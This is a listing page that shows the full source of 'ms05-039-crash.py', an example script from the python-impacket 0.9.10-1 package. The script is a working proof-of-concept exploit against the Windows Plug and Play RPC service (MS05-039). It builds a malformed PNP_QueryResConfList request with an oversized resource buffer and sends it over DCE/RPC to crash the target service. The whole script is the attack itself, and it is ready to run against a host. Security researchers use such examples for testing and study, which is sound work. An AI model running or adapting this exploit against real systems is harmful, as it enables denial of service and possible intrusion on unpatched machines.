/usr/share/doc/python-impacket/examples/ms05-039-crash.py is in python-impacket 0.9.10-1.
This file is owned by root:root, with mode 0o644.
The actual contents of the file can be viewed below.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | import sys
from exploit import DCERPCExploit
from impacket.structure import Structure
class PNP_QueryResConfList(Structure):
alignment = 4
structure = (
('treeRoot', 'w'),
('resourceType','<L=0xffff'),
('resourceLen1','<L-resource'),
('resource', ':'),
('resourceLen2','<L-resource'),
('unknown_1', '<L=4'),
('unknown_2', '<L=0'),
('unknown_3', '<L=0'),
)
class UMPNPExploit(DCERPCExploit):
UUID = ('8d9f4e40-a03d-11ce-8f69-08003e30051b','1.0')
def attackRun(self):
query = PNP_QueryResConfList()
query['treeRoot'] = "ROOT\\ROOT\\ROOT\x00".encode('utf_16_le')
query['resource'] = '\x00'*8+'\x00\x01\x00\x00'+'A'*256
self.dce.call(0x36, query)
e = UMPNPExploit(sys.argv[2:])
e.run()
|